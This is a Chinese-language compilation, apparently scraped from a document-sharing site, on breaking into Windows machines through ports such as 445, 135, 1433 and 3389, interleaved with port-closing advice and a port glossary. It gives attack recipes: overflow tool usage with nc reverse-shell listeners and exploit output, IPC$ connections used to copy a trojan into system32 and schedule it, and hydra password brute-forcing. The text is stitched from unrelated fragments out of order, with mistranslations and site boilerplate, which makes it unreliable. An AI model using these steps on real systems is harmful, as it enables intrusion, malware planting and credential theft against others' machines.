445端口入侵详解
各个端口的入侵方法(入侵菜鸟必看)
各个端口的入侵方法(入侵菜鸟必看)1. 1433端口入侵scanport.exe 查有1433的机器SQLScanPass.exe 进行字典暴破(字典是关键)最后SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口sqlhelloF.exe 入侵ip 1433 本机ip 本机端口(以上反向的,测试成功)sqlhelloz.exe 入侵ip 1433 (这个是正向连接)2. 4899端口入侵用4899过滤器.exe,扫描空口令的机器3. 3899的入侵对很早的机器,可以试试3389的溢出(win3389ex.exe)对2000的机器,可以试试字典暴破。
(tscrack.exe)4. 80入侵对sp3以前的机器,可以用webdav入侵;对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)可以利用SQL进行注入。
(小榕的注入软件)。
5. serv-u入侵(21端口)对5. 004及以下系统,可用溢出入侵。
(serv5004.exe)对5.1.0.0及以下系统,可用本地提升权限。
(servlocal.exe)======================================对serv-u的MD5加密密码,可以用字典暴破。
(crack.vbs)输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。
如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A6. 554端口用real554.exe入侵。
7. 6129端口用DameWare6129.exe入侵。
8. 系统漏洞利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。
9. 3127等端口可以利用doom病毒开的端口,用nodoom.exe入侵。
如何防范135,445端口入侵
4.关闭IPS$
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentConteolset \ Control \ Lsa项,找到restrictanonymous键值,将键值设为1。
5.自定义安全策略
执行"开始-控制面板-管理工具-本地安全策略"在打开的"本地安全设置"窗口中选"IP安全策略 在本地计算机" 在窗口右边空白处单击鼠标右键,选'创建IP安全策略"在弹出的向导中单击"下一步",然后在名称一栏中输入"阻止危险的端口",再单击"下一步"取消对"激活默认响应规则"的选中. 单击"下一步"-"完成" 在"阻止危险端口 属性"对话框中取消对"使用添加向导"的勾选. 单击"添加" 在"新规则属性"对话框中单击"添加"按钮 弹出"IP筛选器列表" 取消对"使用添加向导"的勾选. 单击"添加",在"寻址"页面的"源地址"中选择"任何IP地址",在"目标地址"中选"我的IP地址" 切换到"协议"选项卡在协议类型中选"TCP",然后在"到此端口"中输入"135" 单击"确定"按钮返回"IP筛选器列表"重复以上步骤为其他需要关闭的窗口建立相应的筛选器.完成后单击"确定"在"新规则属性"窗口中选中"新IP筛选器列表" 切换到"筛选器操作"选项卡取消对"使用添加向导"的勾选 然后单击"添加"在"新筛选器操作属性"窗口的"安全措施"选项卡中选择"阻止" 点"确定"返回"新规则属性"选中"新筛选器操作"后,单击"关闭" 在"阻止危险的端口属性"中选"新IP筛选器列表" 关闭,返回"本地安全设置"用鼠标右键单击"阻止危险的端口"在弹出的菜单中选"指派'命令 除了135 445外,其实还有危险的端口:TCP中的135 445 593 1025 3389 UDP中的135 139 445
3389、135、137、138、139、445等端口解释和关闭方法
3389、135、137、138、139、445等端口解释和关闭方法3389端口:在服务器中,3389端口的开放是必需的,因为任何服务器的管理员如果想很好地管理自己的服务器,都需要开启这种方便的网络管理服务。
不过3389端口一旦开启,必然会引来无数黑客,即便那些黑客破解不了密码,也很可能占用你的连接请求数,使你无法登录自己的服务器。
关闭服务器中的3389端口的方法很简单。
在windows2000或2003中,进入控制面板,然后选择“管理工具”中的“服务”,在弹出的服务列表中,选中“Terminal Services”,将该服务的启动类型改为“手动”,然后停止这个服务就可关闭3389端口了。
在windows XP中被黑客悄悄开启远程协作的现象也不是没有发生过。
可以右键点击“我的电脑”,进入“系统属性”窗口中的“远程”选项卡界面,取消对“远程桌面”和“远程协作”选择,再单击确定即可关闭3389端口。
135端口:利用135端口的黑客想要得到管理员的宇航局码和口令,过程往往是很简单,他们似乎部有自己的方法和手段。
关闭135端口,停止可能被黑客利用的RPC服务,不给他们任何能够利用系统弱点的机会。
但单纯地将RPC服务停止会对某些网络用户造成不必要的麻烦。
在网络中,只有使用微软DCOM技术的程序才会调用RemoteProcedure Call,也就是135端口服务,所以在面临这个问题时,将DCOM服务停止是最好的方法。
首先点击“开始”菜单,在“运行”里输入dcomcnfg.exe命令,在弹出的设置窗口中选择“默认设置”标签选项,然后点击选择此选项页面中的“在这台计算机上启用分布式COM”选项,最后点击确定完成。
这样你就可以很好地保护你的电脑了,任何黑客都无法对你电脑中的DCOM服务和DCOM应用程序进行远程操作与访问,达到了既不关闭又能够停止135端口,让黑客放弃攻击你的目的。
137、138端口:在关闭137和138端口之前,先介绍一下NetBIOS服务。
445端口 原理
445端口原理
445端口是Windows操作系统中用于SMB(Server Message Block)通信协议的默认端口号。
SMB是一种用于文件、打印机共享以及其他网络资源共享的协议,允许多台计算机共享文件和打印机,以便用户可以在网络上共享数据和资源。
SMB协议使用445端口进行通信,允许计算机之间进行共享资源的访问和管理。
通过445端口,计算机能够在网络上识别其他计算机并与之通信。
这些共享资源可以是文件夹、打印机或其他网络设备。
网络上的用户可以通过SMB协议访问共享资源,并执行相应的操作,例如读取文件、写入文件、打印文档等。
445端口的原理是在计算机之间建立起SMB通信连接。
当计算机A想要访问计算机B上的共享资源时,计算机A发送一个SMB请求到计算机B的445端口。
计算机B收到请求后,通过445端口回应计算机A,建立起通信连接。
接下来,计算机A可以使用SMB协议通过445端口向计算机B发送请求,获取共享资源的内容或执行一些操作。
445端口的使用存在一些安全风险。
由于SMB协议的漏洞和安全性问题,攻击者可能会利用445端口来进行远程入侵和攻击。
因此,使用445端口时需要注意系统的安全性,及时更新补丁并采取其他安全措施,以防止未经授权的访问和攻击。
总之,445端口是用于SMB通信协议的默认端口号,用于计算机之间的共享资源访问和管理。
通过445端口,计算机可以
建立起SMB通信连接,实现文件、打印机和其他网络资源的共享。
然而,由于安全性问题,使用445端口时需要注意系统的安全性,以防止未经授权的访问和攻击。
445端口入侵详解
445 端口入侵详解 篇一:黑客常用入侵端口详解 常见的入侵端口: 端口:0 服务:Reserved 说明:通常用于分析操作系统。
这一方法能够工作是因为在一些系统中 “0”是无效端口, 当你试图使用通常的闭合端口连接它时将产生不同的结果。
一种典型的扫描,使用 IP 地址为 0.0.0.0,设置 ACK 位并在以太网层广播。
(我被这样入侵过,一般感觉计算机运行慢或是你感觉有问题存在,先去查 ip,如果有入侵赶 紧断掉网,如果晚了他可能就会盗取你很多帐号或资料.) 端口:1 服务:tcpmux 说明:这显示有人在寻找 SGI Irix 机器。
Irix 是实现 tcpmux 的主要提供者,默认情况下 tcpmux 在这种系统中被打开。
Irix 机器在发布是含有几个默认的无密码的帐户,如:IP、GUEST UUCP、NUUCP、DEMOS 、TUTOR、DIAG、OUTOFBOX 等。
许多管理员在安装后忘记删除这些 帐户。
因此 HACKER 在 INTERNET 上搜索 tcpmux 并利用这些帐户。
端口:7 服务:Echo 说明:能看到许多人搜索 Fraggle 放大器时,发送到 X.X.X.0 和 X.X.X.255 的信息。
端口:19 服务:Character Generator 说明:这是一种仅仅发送字符的服务。
UDP 版本将会在收到 UDP 包后回应含有垃圾字符 的包。
TCP 连接时会发送含有垃圾字符的数据流直到连接关闭。
HACKER 利用 IP 欺骗可以发动 DoS 攻击。
伪造两个 chargen 服务器之间的 UDP 包。
同样 Fraggle DoS 攻击向目标地址的这个 端口广播一个带有伪造受害者 IP 的数据包,受害者为了回应这些数据而过载。
端口:21 服务:FTP 说明: FTP 服务器所开放的端口,用于上传、下载。
最常见的攻击者用于寻找打开 anonymous 的 FTP 服务器的方法。
Smb(445)暴力破解与利用(实操)
Smb(445)暴⼒破解与利⽤(实操)⼯具xp⼀台,ip:192.168.40.122win2003⼀台, ip:192.168.0.116⼀、⼩技巧。
探测端⼝开没开着,telnet ip 端⼝,跳出⿊框代表开着了。
平常⽤⼯具探测。
⼆、⽤xp链接2003的c$映射到xp的k盘。
net share 可以看到⽬标开启了哪些共享⽂件。
net use ,然后输⼊⽬标的账号和密码,就能连接上了。
可以当⽹盘使⽤。
这样就能把⽬标的共享资源映射到本地了,这⾥是分别映射了c$d$与share,为kjl盘。
不知道为啥f盘不⾏。
三、取消盘符映射net use 盘符 /del或者取消所有net use * /del四、ipc$连接后可⾃由选择传⽂件到哪并执⾏。
1、net use2、制作⽊马并植⼊⽊马copy d:\heihei.exe \windows\system32\ // 把本地d盘下的⽂件复制到⽬标的c盘\windows\system32\ 下。
3、定时上线:net time //查看⽬标机器的系统时间at \\192.168.0.116 时间(例如16:49)"c: \windows\system32\heihei.exe"at 查看待运⾏任务。
四、暴⼒破解⽬标账号密码可⽤⼯具:NTscan,hydrahydra.exe -l administrator -P e:\pass.txt 192.168.0.116 telnet //爆破密码hydra.exe -l 账号 -P 密码本 ip 协议(ftp、smb)hydra.exe -L 账号字典 -P 密码字典192.168.0.116 telnet。
常见的入侵端口
如果是NTFS格式,相对就麻烦一些。进安全模式。然后启动pulist列
出进程,然后用pskill这个程序(黑客网站有下的)杀掉svchost.exe
程序。然后在COPY过去。
覆盖后重新启动,使用netstat -an命令,可以看到Windows 2000下
已经没有135端口了。XP系统还有TCP的135,但是UDP里面已经没有
2.盘符属性
确定你要删除的盘符,单击鼠标右键选择共享和安全的选项.在弹出的窗口中选择不共享此文件夹.然后点确定.这样就关闭了共享(包括默认共享).
3.控制面板中删除
控制面板—管理工具—计算机管理—共享文件夹—共享
关闭里面的默认共享(包括admin$的删除)
4. 修改注册表
单击“开始/运行”,在运行窗口中输入“Regedit”,打开注册表编辑器,展开“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Lanmanworkstation\parameters”,在右侧窗口中创建一个名为“AutoShareWks”的双字节值,将其值设置为0,(win2000 专业版 win xp);[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
端口说பைடு நூலகம்:这是在安装服务器的时候,把系统安装分区自动进行共享,虽然对其访
问还需要超级用户的密码,但这是潜在的安全隐患,从服务器的安全考
虑,最好关闭这个“默认共享”,以保证系统安全。
关闭方法:关于默认共享的关闭方法有很多种方法.我这里根据自己所知的,归纳
了4种最常用的方法.
1.DOS下删除共享
445端口
防范445端口漏洞的攻击方法:
1.端口排除法
这种方法利用了Windows 2000系统的端口排除功能将来自于445端口的所有信息包全部禁止掉,让“大
恶人”们无法接近你的主机,下面是这种方法的具体实现步骤:
打开Windows 2000系统的开始菜单,选中“设置”项下面的“网络和拨号连接”图标,并用鼠标右键单击之,从其后的快捷菜单中,单击“浏览”命令;
在接着出现的窗口中,右击“Internet连接”图标,选中“属性”选项,弹出Internet连接属性窗口;
打开“常规”标签页面,并在“此连接使用下列选定的组件”列表框中,将“Microsoft网络的文件或打印机共享”选项前面的勾号取消,如图2所示。最后单击“确定”按钮,重新启动系统,Internet上的“大恶人”们就没有权利访问到各种共享资源了。
Trying to send crafted packet...ok
Exploit done!Check your reverse shell on 192.168.0.2:4466
当溢出成功就马上用nc(有瑞士军刀之称)来监听反弹连接到本机4466端口的数据。
第一步,我们需要做的是确定一台存在445端口漏洞的主机。可以用扫描工具扫描得到!比如SUPERSCAN这个端口扫描工具。
第二步,假设现在我们已经得到一台存在445端口漏洞的主机,那么我们就可以利用瑞士军刀nc和溢出工具ms05039进行攻击:
F:\445>ms05039 目标IP 本地IP 1234
Trying to connect to remote port on 192.168.0.3:445...ESTABLISHED
Making null session...ok
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
445端口入侵详解篇一:黑客常用入侵端口详解常见入侵端口:端口:0服务:预订说明:通常用于分析操作系统。
这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用通常的闭合端口连接它时将产生不同的结果。
一种典型的扫描,使用ip地址为0.0.0.0,设置ack位并在以太网层广播。
(我是这样被入侵的。
一般来说,我觉得电脑运行缓慢,或者你觉得有问题。
首先检查IP。
如果有入侵,迅速断开网络。
如果很晚,他可能会窃取你的许多帐户或数据。
)-港口:1服务:tcpmux描述:这表示有人在找sgiirix机器。
IRIX是实现tcpmux的主要提供者,tcpmux在默认情况下是打开的。
IRIX机器在发布期间包含几个默认的无密码帐户,如IP、guestuucp、nuucp、演示、导师、diag、outofbox等。
许多管理员在安装后忘记删除这些帐户。
所以黑客在互联网上搜索tcpmux并使用这些帐户。
-港口:7服务:echo注意:当许多人搜索Fraggle放大器时,您可以看到发送到x.x.x.0和x.x.x.255的信息-端口:19服务:charactergenerator说明:这是一种仅仅发送字符的服务。
udp版本将会在收到udp包后回应含有垃圾字符的包。
tcp连接时会发送含有垃圾字符的数据流直到连接关闭。
hacker利用ip欺骗可以发动dos攻击。
伪造两个chargen服务器之间的udp包。
同样fraggledos攻击向目标地址的这个端口广播一个带有伪造受害者ip的数据包,受害者为了回应这些数据而过载。
端口:21服务:FTP说明:ftp服务器所开放的端口,用于上传、下载。
最常见的攻击者用于寻找打开anonymous的ftp服务器的方法。
这些服务器带有可读写的目录。
木马dolytrojan、fore、invisibleftp、webex、wincrash和bladerunner所开放的端口。
-端口:22服务:SSH说明:pcanywhere建立的tcp和这一端口的连接可能是为了寻找ssh。
这一服务有许多弱点,如果配置成特定的模式,许多使用rsaref库的版本就会有不少的漏洞存在。
-端口:23服务:telnet说明:远程登录,入侵者在搜索远程登录unix的服务。
大多数情况下扫描这一端口是为了找到机器运行的操作系统。
还有使用其他技术,入侵者也会找到密码。
木马tinytelnetserver就开放这个端口。
-端口:25服务:SMTP说明:smtp服务器所开放的端口,用于发送邮件。
入侵者寻找smtp服务器是为了传递他们的spam。
入侵者的帐户被关闭,他们需要连接到高带宽的e-mail服务器上,将简单的信息传递到不同的地址。
木马antigen、emailpasswordsender、haebucoceda、shtrilitzstealth、winpc、winspy都开放这个端口。
-端口:31服务:msgauthentication说明:木马masterparadise、hackersparadise开放此端口。
端口:42服务:winsreplication说明:wins复制-端口:53服务:域名服务器(DNS)说明:dns服务器所开放的端口,入侵者可能是试图进行区域传递(tcp),欺骗dns (udp)或隐藏其他的通信。
因此防火墙常常过滤或记录此端口。
-端口:67服务:引导协议服务器说明:通过dsl和cablemodem的防火墙常会看见大量发送到广播地址255.255.255.255的数据。
这些机器在向dhcp服务器请求一个地址。
hacker常进入它们,分配一个地址把自己作为局部路由器而发起大量中间人(man-in-middle)攻击。
客户端向68端口广播请求配置,服务器向67端口广播回应请求。
这种回应使用广播是因为客户端还不知道可以发送的ip地址。
-端口:69服务:trivalfiletransfer说明:许多服务器与bootp一起提供这项服务,便于从系统下载启动代码。
但是它们常常由于错误配置而使入侵者能从系统中窃取任何文件。
它们也可用于系统写入文件。
-港口:79服务:fingerserver注意:入侵者用于获取用户信息、查询操作系统、检测已知的缓冲区溢出错误,以及响应从自己的机器到其他机器的手指扫描。
-港口:80说明:用于网页浏览。
木马executor开放此端口。
-端口:99服务:元图中继说明:后门程序ncx99开放此端口。
-端口:102服务:TCP/IP上的消息传输代理(MTA)-x.400说明:消息传输代理。
-端口:109服务:邮局协议第三版说明:pop3服务器开放此端口,用于接收邮件,客户端访问服务器端的邮件服务。
pop3服务有许多公认的弱点。
关于用户名和密码交换缓冲区溢出的弱点至少有20个,这意味着入侵者可以在真正登陆前进入系统。
成功登陆后还有其他缓冲区溢出错误。
-端口:110服务:Sun公司RPC服务的所有端口说明:常见rpc服务有rpc.mountd、nfs、rpc.statd、rpc.csmd、rpc.ttybd、amd 等-港口:113服务:authenticationservice注意:这是一个在许多计算机上运行的协议,用于验证TCP连接的用户。
使用这个标准可以获得很多信息。
但是,它可以用作许多服务的记录器,尤其是FTP、pop、IMAP、SMTP、IRC和其他服务。
通常,如果许多客户通过防火墙访问这些服务,他们将看到许多来自该端口的连接请求。
请记住,如果您阻止此端口,客户端将感觉到与防火墙另一侧的电子邮件服务器的连接很慢。
许多防火墙支持在TCP连接阻塞期间发回RST。
这将停止慢速连接-端口:119服务:网络传输协议说明:news新闻组传输协议,承载usenet通信。
这个端口的连接通常是人们在寻找usenet服务器。
多数isp限制,只有他们的客户才能访问他们的新闻组服务器。
打开新闻组服务器将允许发/读任何人的帖子,访问被限制的新闻组服务器,匿名发帖或发送spam。
-港口:135服务:locationservice-端口:137、138、139服务:netbiosnameservice说明:其中137、138是udp端口,当通过网上邻居传输文件时用这个端口。
而139端口:通过这个端口进入的连接试图获得netbios/smb服务。
这个协议被用于windows文件和打印机共享和samba。
还有winsregisrtation也用它。
-端口:143服务:interimmailaccessprotocol V2说明:和pop3的安全问题一样,许多imap服务器存在有缓冲区溢出漏洞。
记住:一种linux蠕虫(admv0rm)会通过这个端口繁殖,因此许多这个端口的扫描来自不知情的已经被感染的用户。
当redhat在他们的linux发布版本中默认允许imap后,这些漏洞变的很流行。
这一端口还被用于imap2,但并不流行。
-端口:161服务:SNMP说明:snmp允许远程管理设备。
所有配置和运行信息的储存在数据库中,通过snmp可获得这些信息。
许多管理员的错误配置将被暴露在internet。
cackers将试图使用默认的密码public、private访问系统。
他们可能会试验所有可能的组合。
snmp包可能会被错误的指向用户的网络。
-端口:177服务:xdisplaymanagercontrol协议说明:许多入侵者通过它访问x-windows操作台,它同时需要打开6000端口。
-端口:389服务:LDAP、ILS说明:轻型目录访问协议和netmeetinginternetlocatorserver共用这一端口。
-港口:443-港口:456服务:[null]描述:特洛伊木马黑客天堂打开此端口。
-港口:513服务:login,remotelogin注意:它是使用CABLEMODEM或DSL从登录到子网的UNIX计算机发送的广播。
这些人提供信息让入侵者进入他们的系统。
-港口:544服务:[null]描述:Kerberos外壳-港口:548服务:macintosh,fileservices(afp/ip)描述:Macintosh,文件服务。
-港口:553服务:corbaiiop(udp)注意:使用CABLEMODEM、DSL或VLAN查看此端口的广播。
CORBA是一个面向对象的RPC系统。
入侵者可以利用这些信息进入系统。
-港口:555服务:dsf描述:特洛伊木马程序阶段10。
Steelthpy和inikiller打开这个端口。
-港口:568服务:membershipdpa描述:会员资格DPA。
-港口:569服务:membershipmsn描述:会员MSN。
-港口:635服务:mountd描述:Linux mountdbug。
这是一个流行的错误扫描。
该端口的大多数扫描是基于UDP 的,但基于TCP的mountd有所增加(mountd同时在两个端口上运行)。
请记住,mountd可以在任何端口上运行(需要在端口111上查询哪个端口),但Linux的默认端口是635,就像NFS通常在端口2049上运行一样。
-港口:636服务:ldap描述:SSL(安全套接字层)-港口:666服务:doomidsoftware注意:特洛伊木马攻击FTP和satanzbackdoor会打开此端口-港口:993服务:imap描述:SSL(安全套接字层)-端口:1001011服务:[null]注意:特洛伊消音器和WebEx会打开端口1001。
特洛伊木马程序dolytrojan打开端口1011-端口:1024服务:预订说明:它是动态端口的开始,许多程序并不在乎用哪个端口连接网络,它们请求系统为它们分配下一个闲置端口。
基于这一点分配从端口1024开始。
这就是说第一个向系统发出请求的会分配到1024端口。
你可以重启机器,打开telnet,再打开一个窗口运行natstat-a将会第二部分:445端口445端口,一个既让人爱,又招人恨的端口,有了它,网民们可以在局域网中轻松访问各种共享文件夹或共享打印机,但正因为有了它,internet上的“恶人”们才有了“可乘之机”,他们能躲在internet上的“阴暗角落”里,偷偷共享你的硬盘,甚至会在悄无声息中,将你的硬盘格式化掉!面对如此猖獗、疯狂的攻击,你能做的,就是运用自己的智慧,与internet上的“大恶人”们,“决战”于445端口之巅!为了助你“敲”开胜利之门,本文特“传授”你如下决战秘诀,仅供参考。
端口排除法单击“开始”→“设置”→“网络和拨号连接”→“internet连接”,选中“属性”选项,弹出internet连接属性窗口;打开“常规”选项卡页面,选择“Internet协议(TCP/IP)”,单击“属性”,然后单击属性页面中的“高级”按钮,打开高级TCP/IP设置窗口,选择“选项”选项卡,在选项卡页面的“可选设置”项中选择“TCP/IP过滤”,点击“属性”打开设置窗口(如图1所示);图1由于端口445是一个TCP端口,您可以在相应的“TCP端口”设置项中选择“仅允许”项,激活下面的“添加”按钮,单击该按钮,然后在“添加过滤器”窗口中添加几个必须使用的服务端口号,不包括未使用的445端口号,设置后,单击“确定”进行设置置生效了。